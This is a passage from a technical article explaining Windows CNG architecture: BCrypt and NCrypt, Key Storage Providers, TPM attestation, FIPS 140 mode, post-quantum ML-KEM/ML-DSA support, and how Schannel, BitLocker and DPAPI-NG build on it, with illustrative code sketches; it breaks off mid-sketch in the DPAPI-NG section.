Note: Three pitfalls recur. First, GCM nonce reuse: BCryptEncrypt with BCRYPT_CHAIN_MODE_GCM accepts whatever 12 bytes you hand it. Counter or random, but never twice. Second, algorithm string drift: BCRYPT_SHA256_ALGORITHM is the macro for L"SHA256". L"SHA-256" returns STATUS_NOT_FOUND. Third, kernel-mode pseudo-handles: the convenient BCRYPT_AES_ALG_HANDLE shortcut is user-mode only per the BCryptOpenAlgorithmProvider remarks [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider]; kernel drivers must use real handles.

Windows 10 added pseudo-handles -- pre-baked handle constants like BCRYPT_AES_ALG_HANDLE and BCRYPT_SHA256_ALG_HANDLE -- that skip the provider lookup for the built-in algorithms. The 24H2 release extended that list to include BCRYPT_MLKEM_ALG_HANDLE and the cSHAKE handles. Microsoft now recommends pseudo-handles over BCryptOpenAlgorithmProvider for new code [@learn-microsoft-com-bcrypt-bcryptopenalgorithmprovider] when the algorithm is built in. The motivation is performance: pseudo-handles bypass the per-call provider walk and the configuration-store lookup.

That covers the primitives. Now we need a place to keep the keys.

3. NCrypt: where the long-lived secrets live

The ncrypt.h header opens a different door. Every function in the NCrypt API surface [@learn-microsoft-com-api-ncrypt] -- NCryptOpenStorageProvider, NCryptCreatePersistedKey, NCryptOpenKey, NCryptSignHash, NCryptDecrypt, NCryptKeyDerivation, NCryptExportKey, NCryptProtectSecret -- begins by routing the call through ncrypt.dll, which acts as a router rather than an implementation. The router decides which Key Storage Provider handles the operation and forwards the call.

That routing layer is the architectural distinction Microsoft has insisted on for two decades. Microsoft's Key Storage and Retrieval documentation [@learn-microsoft-com-and-retrieval] describes it like this: the NCrypt router "conceals details, such as key isolation, from both the application and the storage provider itself." Translation: the application calls NCryptSignHash and gets back a signature. It does not know -- and should not need to know -- whether the key lives in %APPDATA%, inside a TPM chip on the motherboard, on a smart card halfway across the room, or in a network-attached hardware security module in a data center on a different continent.

Key Storage Provider (KSP): A registered plug-in DLL that owns persistent private-key material and exposes it through the NCrypt API. Microsoft ships four built-in KSPs (Software, Platform/TPM, Smart Card, and the Next Generation Credentials provider used by Windows Hello); third parties ship KSPs for HSM appliances, USB security keys, and cloud key services. Selecting a KSP is a matter of passing the right name string to `NCryptOpenStorageProvider`.

The mechanical flow for creating a persisted key looks like this.

sequenceDiagram
participant App as Application
participant Router as ncrypt.dll (NCrypt router)
participant KSP as Microsoft Software KSP
participant LSA as LSA key-isolation process
participant Disk as %APPDATA%\Microsoft\Crypto\Keys\

App->>Router: NCryptOpenStorageProvider("Microsoft Software Key Storage Provider")
Router-->>App: hProvider
App->>Router: NCryptCreatePersistedKey(hProvider, "RSA", "MyKey", 2048, ...)
Router->>KSP: dispatch via registered KSP entry points
KSP->>LSA: LRPC: generate key, return handle
LSA->>Disk: write DPAPI-wrapped private blob
LSA-->>KSP: ok
KSP-->>Router: hKey
Router-->>App: hKey
App->>Router: NCryptSignHash(hKey, digest)
Router->>KSP: forward
KSP->>LSA: LRPC: sign with isolated key
LSA-->>KSP: signature
KSP-->>Router: signature
Router-->>App: signature

Two facts about that diagram matter. First, the private key bits never enter the calling process. They are generated inside the LSA process and the calling application only ever receives a handle and the eventual signature. Second, the LRPC hop is real: it costs roughly 30 to 100 microseconds per call on modern hardware. For bulk symmetric encryption you would not want this overhead, which is why CNG's design pushes you toward BCrypt for symmetric work and reserves NCrypt for the rarer, smaller, and more sensitive operations on long-lived asymmetric keys.

The LSA key-isolation process is lsaiso.exe on systems with Credential Guard enabled, hosted inside the Virtualization-Based Security (VBS) trustlet boundary. On systems without VBS, the role is played by lsass.exe itself. Either way, key material does not enter the application's address space.
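To see why the hop rules out bulk work, take the 30 to 100 microsecond range quoted above at face value and ask what a single thread could move if every call paid it. The Python sketch below is back-of-the-envelope arithmetic: the 4 KiB payload per call is an assumption chosen for illustration, and the time spent on the cryptography itself is ignored.

```python
def max_throughput_bytes_per_sec(per_call_overhead_us: float, bytes_per_call: int) -> float:
    """Upper bound on throughput when every call pays a fixed round-trip cost."""
    calls_per_sec = 1_000_000 / per_call_overhead_us
    return calls_per_sec * bytes_per_call


best = max_throughput_bytes_per_sec(30, 4096)    # 30 us hop, 4 KiB per call
worst = max_throughput_bytes_per_sec(100, 4096)  # 100 us hop, 4 KiB per call

print(f"best case:  {best / 1e6:.0f} MB/s")
print(f"worst case: {worst / 1e6:.0f} MB/s")
```

Under those assumptions the ceiling sits between roughly 41 and 137 MB/s per thread, well below the multi-GB/s figures quoted earlier for in-process AES-GCM. One signature per logon does not notice the hop; one call per disk block would.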

NCrypt is also where the asymmetric algorithms live in their persistent form. The Microsoft Software Key Storage Provider claims RSA keys from 512 to 16384 bits in 64-bit increments, DSA, DH, and ECDSA/ECDH on the NIST P-256, P-384, and P-521 curves [@learn-microsoft-com-and-retrieval]. Windows 11 24H2 added ML-KEM at the 512, 768, and 1024 parameter sets and ML-DSA at the 44, 65, and 87 parameter sets to the Software KSP's repertoire.

The split between BCrypt and NCrypt is sometimes confusing because there is overlap. You can sign with BCrypt's BCryptSignHash if you generated an ephemeral key pair. You can also sign with NCrypt's NCryptSignHash if the key is persisted in a KSP. The rule of thumb is: if the key needs to survive the process, use NCrypt; if it does not, use BCrypt. Real-world Windows code skews heavily toward NCrypt for asymmetric operations because almost every interesting asymmetric key has an associated certificate, and certificates outlive processes.

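Note: The four Microsoft KSP name strings are MS_KEY_STORAGE_PROVIDER (Software), MS_PLATFORM_KEY_STORAGE_PROVIDER (TPM/Pluton), MS_SMART_CARD_KEY_STORAGE_PROVIDER, and MS_NGC_KEY_STORAGE_PROVIDER (Next Generation Credentials, used by Windows Hello). The name you pass is the only thing that selects the backend. If the name gets dropped on the way to the call and NULL arrives instead, you silently get the default Software KSP, which is a recurring source of "why is my key on disk instead of in the TPM" incident reports. A misspelled name should fail the open call instead of falling back, so check the status that NCryptOpenStorageProvider returns.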

The router lets the application speak one language and have the storage backend vary. That makes the KSP plug-in model the most interesting piece of the architecture, and it deserves its own section.

4. The KSP model: one API, many places to keep keys

A KSP is a DLL on disk and an entry in the registry. The DLL exports a fixed set of function pointers that mirror NCrypt's API. The registry entry under HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Providers\Microsoft Software Key Storage Provider (and its siblings) tells ncrypt.dll which DLL to load when an application asks for a provider by name. That is the whole interface contract. If you can produce a DLL that implements the entry points and you can install a registry entry, you have a CNG KSP.

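Four kinds of KSP matter for the rest of this section: the Microsoft Software, Platform, and Smart Card providers, plus the third-party HSM providers. They sit on a spectrum from "your operating system is the entire trust boundary" to "the keys live on a separate piece of silicon and only signatures come back."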

flowchart LR
A["Microsoft Software KSP -- private keys on disk -- (DPAPI-wrapped)"] --> B["Microsoft Platform Crypto Provider -- TPM 2.0 or Pluton -- on-CPU silicon"]
B --> C["Microsoft Smart Card KSP -- removable hardware token -- (PIV, CAC, Yubikey)"]
C --> D["Third-party HSM KSP -- Thales Luna, Entrust nShield, -- YubiHSM 2, AWS CloudHSM"]
A -.-> A1["~10^4 RSA-2048 sign/sec -- FIPS 140-2 L1"]
B -.-> B1["~1-10 sign/sec -- TPM vendor cert"]
C -.-> C1["~1-5 sign/sec -- card vendor cert"]
D -.-> D1["~10^2-10^4 sign/sec -- FIPS 140-2/-3 L3 typical"]

4.1 The Microsoft Software KSP

The default. If you pass NULL for the provider name in NCryptOpenStorageProvider, you get this one. It stores per-user private keys at %APPDATA%\Microsoft\Crypto\Keys\ and per-machine keys at %ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\SystemKeys\, with each file-level blob further protected by DPAPI under either the user master key or the LocalSystem (S-1-5-18) master key. The private-key operations dispatch through LRPC into the LSA key-isolation process so that even with administrator privileges on the machine, naive code-injection into the application's address space does not yield key bits.

The Microsoft Software KSP is also the only KSP that runs inside the LSA key-isolation process. Third-party KSPs run in the calling application's process. That difference matters enormously for the threat model. Microsoft notes this explicitly: third-party KSPs "do not run inside the LSA process" [@learn-microsoft-com-and-retrieval]. If you are a third-party KSP that talks to remote HSM hardware, the isolation comes from the HSM itself, not from any Windows process boundary.

4.2 The Microsoft Platform Crypto Provider (TPM and Pluton)

The KSP that answers to MS_PLATFORM_KEY_STORAGE_PROVIDER is the TPM's face to CNG. When you call NCryptCreatePersistedKey against it, the TPM 2.0 chip itself [@learn-microsoft-com-tpm-fundamentals] generates the key under the protection of its Storage Root Key. The private bits never leave the chip. The application gets back a handle whose only operations are sign, decrypt, and key derivation -- the private key cannot be exported, and that property is enforced by physics, not by software policy.

Key idea: The Platform Crypto Provider is the place where CNG stops trusting the operating system and starts trusting a separate piece of silicon. Every TPM-backed key in Windows -- BitLocker's Volume Master Key wrapping, Windows Hello credentials, AD CS attestation-enrolled machine identities -- enters and exits through this single KSP name.

Microsoft Pluton, the security processor that first shipped in 2022 on AMD Ryzen 6000 and Snapdragon 8cx Gen 3 silicon and later reached Intel Core Ultra Series 2, is exposed to Windows as a TPM 2.0 device behind the same Platform Crypto Provider name [@learn-microsoft-com-security-processor]. Application code that worked against a discrete TPM works against Pluton with no changes. Pluton's wins are at the supply-chain layer (no SPI bus to physically tap between the chip and the CPU) and the firmware-update layer (Pluton firmware ships via Windows Update). The Windows-facing API is intentionally identical.

4.3 The Microsoft Smart Card KSP

MS_SMART_CARD_KEY_STORAGE_PROVIDER is a single KSP that routes to whichever vendor minidriver claims the inserted card. The minidriver model is Microsoft's plug-in layer below the KSP layer: smart-card vendors do not write CNG KSPs, they write minidrivers, and Microsoft's single KSP fans the calls out to them; each minidriver then speaks APDUs to its card. Cards that follow Microsoft's Generic Identity Device Specification (GIDS) [@learn-microsoft-com-device-specification] work without a vendor minidriver. Cards that do not, including most US federal PIV cards before about 2015, ship vendor-specific minidrivers.

This is the layer that powers Windows Hello for Business "virtual smart card" credentials, which present a TPM-backed key through the smart-card path because so much enterprise software already knew how to talk to PIV-style cards.

4.4 Third-party HSM and security-key KSPs

YubiHSM 2, Thales Luna, Entrust nShield, AWS CloudHSM Client for Windows, and various cloud-KMS bridges all ship CNG KSPs. The KSP DLL pretends to be a local provider and proxies operations across whatever transport the device uses -- USB for a YubiHSM, PCIe or TCP for a Luna, HTTPS for a cloud HSM. Latency varies with the transport, from a local USB or PCIe round trip up to a few milliseconds for a network HSM. The application code that calls NCryptSignHash does not change.

For an internal Active Directory Certificate Services CA, the KSP choice is the entire trust story. A CA whose root key lives in the Software KSP can have that key extracted by any administrator. A CA whose root lives in a FIPS 140-2 Level 3 HSM KSP requires physical access to the HSM (often with multi-person key ceremonies) to recover the key. The application code in `certutil` is identical in both cases. The audit story is not.

5. The TPM KSP, attestation, and the hardware boundary

A TPM-bound key is a useful key, but a TPM-bound key with an attestation statement is a different kind of asset entirely. The Trusted Platform Module supports a primitive called key attestation: the TPM can sign a statement that says, "this key was generated inside me, I will never let it out, and here is a chain of trust back to my Endorsement Key that proves I am a real TPM made by a real vendor." A certificate authority that requires this attestation can refuse to issue a certificate for any key that did not come from inside a TPM.

Active Directory Certificate Services supports exactly this flow as "TPM key attestation" [@learn-microsoft-com-key-attestation]. The flow involves three keys: an Endorsement Key (EK) burned into the TPM at manufacture, an Attestation Identity Key (AIK) generated inside the TPM, bound to the EK, and certified by Microsoft or by the enterprise PKI, and the application key being attested. The AIK signs a statement covering the application key's properties; the CA verifies the AIK certificate chain and the statement, and only then issues a certificate.

flowchart TD
EK["Endorsement Key (EK) -- burned into TPM at manufacture -- vendor cert from Intel/AMD/etc."]
AIK["Attestation Identity Key (AIK) -- generated in TPM, certified by -- Microsoft EK CA or enterprise PKI"]
APPK["Application key -- generated in TPM via -- NCryptCreatePersistedKey"]
STMT["Attestation statement -- signed by AIK"]
CA["Enterprise CA (AD CS) -- verifies AIK chain -- and attestation"]
CERT["X.509 certificate -- issued to application key"]

EK --> AIK
AIK --> STMT
APPK --> STMT
STMT --> CA
CA --> CERT

The CNG-facing API for this is the property bag on a NCRYPT_KEY_HANDLE. After creating the key, the application calls NCryptGetProperty with NCRYPT_KEY_ATTESTATION_PROPERTY (and friends) to retrieve the attestation blob. The CA receives the blob in the certificate request and validates it against Microsoft's published EK CA roots. The whole protocol fits inside the standard certificate-enrollment flow.

Key idea: A software KSP can promise that a key is non-exportable. A TPM KSP can prove it.

Throughput is the price. A typical TPM 2.0 chip performs single-digit RSA-2048 signatures per second. Pluton-based platforms are in the same neighborhood. Any architecture that wants to do a TPM signature on every HTTP request will fall over almost immediately. The TPM is the right home for one signature per session, per boot, or per logon -- not one per packet.

Key migration between TPMs is essentially impossible by design. Replace a motherboard, and any keys that were sealed to the old TPM's Storage Root Key are gone. This is the same property that makes BitLocker safe against a drive being pulled and read in another machine (the recovery key, escrowed elsewhere, is the only way back) and the same property that makes TPM-bound device identities a key-management headache during hardware refresh cycles.

There is a deeper, more philosophical reason to use the TPM that the API does not advertise. Software keys are bounded by the kernel's process-isolation guarantees. Any kernel-level attacker, any user with SeDebugPrivilege, or any code injected into lsass.exe can in principle reach key material. The stronger bound -- keys that no OS-level code can ever read -- requires a hardware boundary that OS-level code cannot cross. CNG's own design notes acknowledge this when they say CNG "is designed to be usable as a component in a FIPS level 2 validated system" [@learn-microsoft-com-cng-features]: software-only isolation maps to FIPS 140-2 Levels 1 and 2; hardware boundaries are required for Level 3 and above.

6. FIPS 140 mode, compliance, and the one-bit toggle

There is a registry value at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled. When it is set to 1 (or when the equivalent Group Policy "System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing" is enabled), Schannel and CNG callers refuse to use algorithms that fall outside the FIPS-approved set. RC4 disappears. MD5 disappears. SHA-1 disappears for new signatures (though not for legacy verification). TLS suites that rely on any of those are removed from the negotiation list.

The toggle is a runtime gate, not a code path. The underlying modules -- bcryptprimitives.dll and cng.sys [@learn-microsoft-com-140-windows11] -- are the same modules either way. They have been submitted to the Cryptographic Module Validation Program [@csrc-nist-gov-modules-search] and validated against the FIPS 140-2 standard [@csrc-nist-gov-2-final]. The toggle simply tells those modules that the calling environment expects FIPS-mode behavior, and the modules then refuse the non-approved algorithms.

FIPS 140 validation: A US federal certification program (Federal Information Processing Standard 140) that subjects a cryptographic module to laboratory testing and NIST review. Validated modules receive a public CMVP certificate. Federal agencies, FedRAMP/CMMC contractors, and most regulated industries can only use validated modules in approved configurations. FIPS 140-2 and the newer FIPS 140-3 differ mainly in test methodology and the standard's own ISO/IEC alignment.

Two current Windows 11 certificate numbers are worth memorizing. CMVP certificate #4825 covers bcryptprimitives.dll [@csrc-nist-gov-certificate-4825]. CMVP certificate #4766 covers cng.sys [@csrc-nist-gov-certificate-4766], the kernel-mode primitives. Both are FIPS 140-2 Level 1 modules with a sunset date of September 21, 2026 under the CMVP's transition rules. Microsoft maintains the per-version FIPS validation portal for Windows 11 [@learn-microsoft-com-140-windows11], which lists the active certificates per build and the algorithms each one covers.

The cadence mismatch is the open story here. Windows 11 ships a feature update roughly once a year. CMVP validation of a new build's primitives DLL and kernel module typically takes 12 to 24 months. Federal customers, FedRAMP-bound cloud tenants, and CMMC contractors cannot run a Windows build that does not have an active FIPS certificate covering its cryptographic modules. Microsoft submits 140-3 evidence for newer modules, but as of mid-2026 no public 140-3 certificate is visible on CMVP for the bcryptprimitives.dll shipping in Windows 11 24H2.

Note: Setting FIPSAlgorithmPolicy\Enabled = 1 is necessary for FIPS compliance, but not sufficient. The validated configuration also requires that Windows be a covered build (with an active certificate), that you avoid third-party crypto libraries that have not been validated, and that algorithm choices stay inside the per-certificate Approved Mode list. A Windows version without an active certificate is not in compliance even with the toggle on.

The toggle also does not change the SymCrypt implementations. AES-GCM is still AES-GCM. What changes is which APIs the caller is allowed to reach. From the application's point of view, the symptom of FIPS mode is STATUS_NOT_SUPPORTED on BCryptOpenAlgorithmProvider(L"RC4", ...). From an auditor's point of view, the symptom is the absence of any disallowed primitive call in the binary.
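The "runtime gate, not a code path" idea can be shown in a few lines. The Python sketch below is a toy model of the behavior this section describes, not Windows code: `APPROVED` is an illustrative subset rather than any certificate's Approved Mode list, `NotSupported` stands in for STATUS_NOT_SUPPORTED, and where the real check lives (inside the module or in a policy-aware caller) is deliberately not modeled.

```python
# Illustrative subset only; the real list comes from the CMVP certificate's security policy.
APPROVED = {"AES", "SHA256", "SHA384", "SHA512", "RSA", "ECDSA_P256"}


class NotSupported(Exception):
    """Stand-in for STATUS_NOT_SUPPORTED in this toy model."""


def open_algorithm_checked(alg_id: str, fips_enabled: bool) -> str:
    # The implementation behind the handle is the same either way;
    # the policy flag only decides whether the caller may reach it.
    if fips_enabled and alg_id not in APPROVED:
        raise NotSupported(alg_id)
    return f"handle:{alg_id}"


print(open_algorithm_checked("AES", fips_enabled=True))
print(open_algorithm_checked("RC4", fips_enabled=False))
try:
    open_algorithm_checked("RC4", fips_enabled=True)
except NotSupported as exc:
    print(f"refused under FIPS policy: {exc}")
```

The useful habit this suggests is treating the refusal as an expected, testable outcome: a test that flips the flag and asserts on the error is cheap, and it is the same check a FIPS-enabled production server will perform for you later.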

7. The post-quantum slide: ML-KEM, ML-DSA, and the agility test

The piece of CNG that earns its "agility" billing is the post-quantum transition.

NIST opened the Post-Quantum Cryptography standardization process in 2016 and ran three rounds of public evaluation [@csrc-nist-gov-quantum-cryptography] before selecting its first algorithms in 2022 and issuing the first final standards in August 2024 (a fourth round continued for additional KEM candidates). FIPS 203 standardizes ML-KEM (formerly CRYSTALS-Kyber), a module-lattice key encapsulation mechanism [@nvlpubs-nist-gov-fips-nistfips203pdf]. FIPS 204 standardizes ML-DSA (formerly CRYSTALS-Dilithium), a module-lattice digital signature algorithm [@csrc-nist-gov-204-final]. Microsoft Research had been working on lattice cryptography for years [@microsoft-com-quantum-cryptography], and the public CNG implementations followed quickly: Windows 11 24H2 ships ML-KEM and ML-DSA as first-class CNG algorithms.

Here is the surprising part: the CNG API surface barely changed. Adding ML-KEM was mostly a matter of registering new algorithm identifier strings -- BCRYPT_MLKEM_ALGORITHM, the parameter sets BCRYPT_MLKEM_PARAMETER_SET_512, BCRYPT_MLKEM_PARAMETER_SET_768, BCRYPT_MLKEM_PARAMETER_SET_1024 -- in the CNG algorithm-identifier registry [@learn-microsoft-com-algorithm-identifiers], plus the KEM-specific BCryptEncapsulate and BCryptDecapsulate calls. The opening dance for an ML-KEM key encapsulation looks exactly like the opening dance for an ECDH key agreement, except for the string.

{`
// Mirrors the BCrypt pattern shown in the Microsoft sample
// "Using ML-KEM with CNG for Key Exchange"

const hAlg = BCryptOpenAlgorithmProvider("ML-KEM", null, 0);

const hKeyPair = BCryptGenerateKeyPair(hAlg, 0, 0);
BCryptSetProperty(hKeyPair, "ParameterSetName", "ML-KEM-768");
BCryptFinalizeKeyPair(hKeyPair, 0);

const pubBlob = BCryptExportKey(hKeyPair, "MLKEMPUBLICBLOB");

// Sender side: encapsulate to recipient's public key
const recipPub = BCryptImportKeyPair(hAlg, "MLKEMPUBLICBLOB", pubBlob);
const { ciphertext, sharedSecret: ssA } = BCryptEncapsulate(recipPub);

// Recipient side: decapsulate with the matching private key
const ssB = BCryptDecapsulate(hKeyPair, ciphertext);

// ssA === ssB
`}

That code is structurally identical to a 2007-era ECDH session. The string changes, the blob format changes, and the wire-format sizes change considerably. ML-KEM ciphertexts at the 512, 768, and 1024 parameter sets are 768, 1088, and 1568 bytes respectively, with public keys of 800, 1184, and 1568 bytes per FIPS 203 [@csrc-nist-gov-203-final]. ML-DSA signatures at parameter sets 44, 65, and 87 are 2420, 3309, and 4627 bytes per FIPS 204 [@csrc-nist-gov-204-final]. For comparison, an ECDSA P-256 signature is 64 bytes and an X25519 public key is 32 bytes. The PQC blowup runs from about 25x (an ML-KEM-512 public key against X25519) to about 72x (an ML-DSA-87 signature against ECDSA P-256), well past a single order of magnitude, and that has knock-on consequences for every protocol that carries certificates or handshakes on the wire.
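The size comparison is plain division, and putting it in a table makes the scale concrete. The Python sketch below uses only the byte counts quoted above; the dictionary and variable names are illustrative.

```python
# Byte sizes as quoted in the text (FIPS 203 and FIPS 204 parameter sets).
ML_KEM = {
    "ML-KEM-512": {"public_key": 800, "ciphertext": 768},
    "ML-KEM-768": {"public_key": 1184, "ciphertext": 1088},
    "ML-KEM-1024": {"public_key": 1568, "ciphertext": 1568},
}
ML_DSA_SIGNATURE = {"ML-DSA-44": 2420, "ML-DSA-65": 3309, "ML-DSA-87": 4627}

X25519_PUBLIC_KEY = 32      # classical key-exchange baseline
ECDSA_P256_SIGNATURE = 64   # classical signature baseline

kem_ratio = {name: s["public_key"] / X25519_PUBLIC_KEY for name, s in ML_KEM.items()}
sig_ratio = {name: size / ECDSA_P256_SIGNATURE for name, size in ML_DSA_SIGNATURE.items()}

for name, ratio in {**kem_ratio, **sig_ratio}.items():
    print(f"{name:12s} {ratio:5.1f}x the classical baseline")
```

The public-key ratios come out at 25x, 37x, and 49x, and the signature ratios at roughly 38x, 52x, and 72x. A certificate chain carries several signatures and public keys, so the multiplier applies more than once per handshake.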

The reason ML-KEM matters before any large quantum computer exists is the harvest-now, decrypt-later attack: an adversary recording today's TLS sessions can decrypt them years from now if the long-lived key-exchange material was only protected by RSA or ECDH. Long-lived secrets transmitted over the wire today -- medical records, source code, government cables -- have a confidentiality lifetime measured in decades. The motivation for hybrid PQ key exchange is that you cannot un-record traffic.

Lattice schemes are young compared with elliptic curves, which is why most TLS-PQ deployments use hybrid groups: classical X25519 combined with ML-KEM-768, with the shared secret derived from both. If either component breaks, the other one still holds. The IETF draft draft-kwiatkowski-tls-ecdhe-mlkem [@learn-microsoft-com-mlkem-examples] defines the X25519MLKEM768 group with IANA codepoint 0x11EC, and Chrome, Cloudflare, and AWS shipped support in production in 2024. OpenJDK JEP 527 [@openjdk-org-jeps-527] tracks the equivalent work for Java's TLS stack. Schannel in Windows 11 24H2 can negotiate ML-KEM through CNG, but Microsoft has not publicly committed to a default-on hybrid group at the Schannel layer as of mid-2026.
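"Derived from both" has a simple shape: concatenate the two component secrets and run the result through an extractor. The Python sketch below shows that shape with HKDF-Extract over SHA-256. It is a simplification under stated assumptions: the two 32-byte inputs are random placeholders rather than real X25519 or ML-KEM outputs, the ML-KEM-first concatenation order should be checked against the draft, and the real TLS 1.3 key schedule has more steps than one extract call.

```python
import hashlib
import hmac
import os


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """HKDF-Extract (RFC 5869) instantiated with SHA-256."""
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def hybrid_secret(ss_mlkem: bytes, ss_x25519: bytes, salt: bytes) -> bytes:
    """Combine two 32-byte component secrets into one extracted secret."""
    if len(ss_mlkem) != 32 or len(ss_x25519) != 32:
        raise ValueError("each component secret must be 32 bytes")
    # Assumed order: ML-KEM secret first, then the X25519 secret.
    return hkdf_extract(salt, ss_mlkem + ss_x25519)


salt = bytes(32)             # placeholder salt for the sketch
ss_mlkem = os.urandom(32)    # placeholder for the ML-KEM-768 shared secret
ss_x25519 = os.urandom(32)   # placeholder for the X25519 shared secret

combined = hybrid_secret(ss_mlkem, ss_x25519, salt)
print(combined.hex())
```

Because both inputs feed a single extraction, an attacker who recovers only one component still faces 32 unknown bytes in the other. That is the property that makes the hybrid worth the extra kilobyte on the wire.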

On a Windows 11 24H2 machine, the following PowerShell snippet asks CNG for its registered algorithms:

[System.Security.Cryptography.CngAlgorithm]::new("ML-KEM")
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\Default\0010'

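The first line only constructs a CngAlgorithm name object; the constructor wraps the string and does not query any provider, so it cannot fail on an older build. The second line does the real work by walking the configuration store. If the keys ML-KEM and ML-DSA appear, your kernel-mode and user-mode primitives are 24H2-current.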

The bigger structural lesson is that two decades of "cryptographic agility" claims actually paid off. The PQC transition required a 24H2 update, not a CNG redesign.

8. Where CNG actually shows up: TLS, BitLocker, and friends

The argument for an OS-level cryptographic API stands or falls on what runs on top of it. Every modern Windows component that touches cryptography is a CNG consumer.

Schannel: The Windows implementation of TLS and DTLS, exposed through the SSPI (Security Support Provider Interface). Schannel handles the TLS protocol state machine, certificate validation, and cipher-suite negotiation, then delegates the actual cryptography to BCrypt and NCrypt. The cipher-suite priority list and protocol-version controls are configured per Windows version, often via Group Policy.

Schannel, the Windows TLS stack, sits directly above CNG. The Schannel cipher-suite list is its own per-version object, documented at the Schannel cipher-suites portal [@learn-microsoft-com-in-schannel]. For TLS 1.2 and earlier, the order is administered via the registry key HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Configuration\Local\SSL\00010002 (the "Functions" value) or the Group Policy "SSL Cipher Suite Order." For TLS 1.3, the three suites (TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256, TLS_CHACHA20_POLY1305_SHA256) are not user-orderable; Schannel hard-codes the priority. TLS 1.0 and TLS 1.1 are off by default in Windows 11 23H2 and later, per Microsoft's August 2023 deprecation announcement [@techcommunity-microsoft-com-windows-3887947].

flowchart TD
App["Application -- (WinHTTP, HttpClient, browser, ...)"]
SSPI["SSPI / CredSSP layer"]
Schannel["Schannel -- protocol state machine -- cipher-suite negotiation"]
BCrypt["BCrypt -- AES-GCM, SHA-2/3, HKDF, RNG"]
NCrypt["NCrypt -- server cert private key sign -- client cert auth"]
KSP["KSP (Software / TPM / -- Smart Card / HSM)"]

App --> SSPI
SSPI --> Schannel
Schannel --> BCrypt
Schannel --> NCrypt
NCrypt --> KSP

BitLocker is the canonical NCrypt-and-TPM consumer. The Full Volume Encryption Key (FVEK) is generated and stored encrypted on disk. The Volume Master Key (VMK) wraps the FVEK and is itself wrapped by one or more "protectors": the TPM, a recovery password, a startup PIN, a USB startup key. The TPM protector is an NCrypt-style operation against the Platform Crypto Provider, sealed to a set of Platform Configuration Register (PCR) measurements that capture the boot state. If anything in the early boot chain changes, the PCRs do not match, the TPM refuses to unwrap the VMK, and BitLocker falls back to recovery.
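The PCR mechanism is a hash chain, which is why any change early in boot changes the final value. The Python sketch below models extend-and-compare with SHA-256. It is a toy under stated assumptions: the component byte strings are made up, a real TPM keeps the sealed blob encrypted under its own storage hierarchy, and the `unseal` helper here only models the policy check.

```python
import hashlib
import hmac
from typing import Iterable


def extend(pcr: bytes, component: bytes) -> bytes:
    """PCR extend: new = SHA-256(old || SHA-256(component))."""
    return hashlib.sha256(pcr + hashlib.sha256(component).digest()).digest()


def measure(components: Iterable[bytes]) -> bytes:
    pcr = bytes(32)  # the register starts at all zeros after reset
    for component in components:
        pcr = extend(pcr, component)
    return pcr


def unseal(sealed_vmk: bytes, sealed_to: bytes, current_pcr: bytes) -> bytes:
    """Release the secret only if the current PCR matches the sealing policy."""
    if not hmac.compare_digest(sealed_to, current_pcr):
        raise PermissionError("PCR mismatch: fall back to recovery")
    return sealed_vmk


good_boot = [b"firmware v1", b"bootmgr v1", b"winload v1"]      # hypothetical components
tampered_boot = [b"firmware v1", b"bootmgr EVIL", b"winload v1"]

policy = measure(good_boot)
vmk = b"volume-master-key-placeholder"

print(unseal(vmk, policy, measure(good_boot)) == vmk)
try:
    unseal(vmk, policy, measure(tampered_boot))
except PermissionError as exc:
    print(exc)
```

Because each extend folds the previous value into the next hash, there is no way to "undo" a bad measurement later in boot. That one-way property is also why a firmware update can trigger a recovery prompt on a TPM-only protector.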

Authenticode, the signature format on Windows binaries, is an NCrypt-driven workflow at signing time and a BCrypt-driven workflow at verification time. The Windows kernel verifies driver signatures, the Windows loader verifies binary signatures, and WinVerifyTrust exposes the same machinery to applications. The hash algorithm in modern Authenticode is SHA-256, which means every signed executable on the system has a SHA-256 digest computed by BCrypt at some point during validation.

Credential Guard runs the LSA isolated process (lsaiso.exe) inside the Virtualization-Based Security trustlet boundary on systems with VBS enabled. Credential Guard does not replace CNG; it relocates the Microsoft Software KSP into a stronger isolation boundary. NTLM password hashes and Kerberos TGT session keys live inside that boundary, accessible only through the standard CNG calls dispatched into the trustlet.

Windows Hello for Business uses the Platform Crypto Provider as the home for the user's gesture-protected authentication key. The biometric (or PIN) unlocks a key in the TPM; that key signs an attestation that is consumed by Azure AD or AD FS. The biometric never leaves the device.

DPAPI and DPAPI-NG are themselves built on CNG, and they deserve their own section because they are the easiest place to see how the layering pays off.

Schannel, BitLocker, EFS, Authenticode, Credential Guard, Windows Hello, DPAPI-NG, IPsec, SMB encryption, Kerberos PKINIT -- every modern Windows component is a CNG consumer.

9. DPAPI-NG: a worked example of the NCrypt model

The original Data Protection API (DPAPI), shipped with Windows 2000, was a per-user secret-protection mechanism. An application called CryptProtectData, passed a blob of secret data, and got back an encrypted blob that only the same user on the same machine could later unwrap. The mechanism was anchored in the user's logon credentials, with a master key per user and a complex backup mechanism for password resets. It worked. It also locked the secret to a single machine, which became a problem the moment users started living on more than one device.

DPAPI-NG, introduced in Windows 8 and Windows Server 2012, is the cloud-era rebuild. The CNG DPAPI documentation [@learn-microsoft-com-cng-dpapi] describes the three calls: NCryptCreateProtectionDescriptor, NCryptProtectSecret, and NCryptUnprotectSecret. The protection descriptor is a small string that names who can unwrap the data. Examples include SID=S-1-5-21-... for an Active Directory user or group, LOCAL=user for the legacy single-user behavior, WEBCREDENTIALS=... for a credential vault entry, and combinations connected by AND or OR operators.
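The descriptor string is small enough to parse by hand, which makes its semantics easy to see. The Python sketch below reads a rule as OR-separated groups of AND-joined KEY=VALUE protectors and checks whether a caller satisfies any group. It is a simplified model, not the real grammar: the SID is a made-up example, values containing the words AND or OR are not handled, and `parse_descriptor` and `can_unprotect` are illustrative names.

```python
import re
from typing import List, Set, Tuple

Term = Tuple[str, str]


def parse_descriptor(rule: str) -> List[List[Term]]:
    """Parse 'A=x AND B=y OR C=z' into [[(A, x), (B, y)], [(C, z)]]."""
    groups: List[List[Term]] = []
    for or_part in re.split(r"\s+OR\s+", rule.strip()):
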